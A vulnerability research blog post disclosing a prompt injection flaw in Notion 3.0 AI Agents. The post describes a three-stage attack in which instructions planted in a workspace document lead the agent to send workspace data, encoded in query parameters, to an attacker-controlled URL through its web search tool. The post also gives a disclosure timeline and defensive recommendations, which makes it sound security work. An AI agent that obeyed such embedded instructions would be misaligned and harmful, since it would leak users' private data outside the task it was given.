All Research·Vulnerability Research

The Hidden Risk in Notion 3.0 AI Agents: Web Search Tool Abuse for Data Exfiltration

Abi Raghuram

Abi Raghuram

Sep 19, 2025 · 12 min read

The Hidden Risk in Notion 3.0 AI Agents: Web Search Tool Abuse for Data Exfiltration

Executive Summary

We discovered a critical security vulnerability in Notion 3.0's AI Agents that demonstrates how the combination of LLM agents, web search tool access, and long-term memory creates exploitable attack vectors for data exfiltration. This vulnerability allowed an attacker to extract sensitive workspace content by injecting malicious instructions into documents that the AI agent would later process.

The Attack Vector

Notion 3.0 introduced AI Agents capable of browsing the web, reading workspace content, and maintaining memory across sessions. This combination — while powerful — creates a classic prompt injection surface.

An attacker who can place content in a Notion workspace can inject instructions that the AI agent will execute when processing that content. Combined with web search capabilities, those instructions can exfiltrate data to an attacker-controlled server.

Technical Details

The attack works in three stages:

1. **Injection**: Malicious prompt is embedded in a Notion document, database entry, or comment

2. **Retrieval**: Notion's AI agent processes the document as part of a legitimate task

3. **Exfiltration**: The injected instruction triggers a web search to an attacker-controlled URL, encoding sensitive data in the query parameters

Impact

This vulnerability could allow an attacker with document access to:

- Extract content from other pages the AI has read

- Steal information from the agent's memory store

- Exfiltrate workspace-wide data during any AI-assisted task

Disclosure Timeline

We reported this vulnerability to Notion's security team and worked with them through responsible disclosure. This post is published following the patch rollout.

Defense Recommendations

Organizations using Notion 3.0 AI features should:

1. Audit which users can create content that AI agents will process

2. Monitor AI agent web search activity for anomalous patterns

3. Implement data loss prevention controls on AI-generated outputs

Back to all research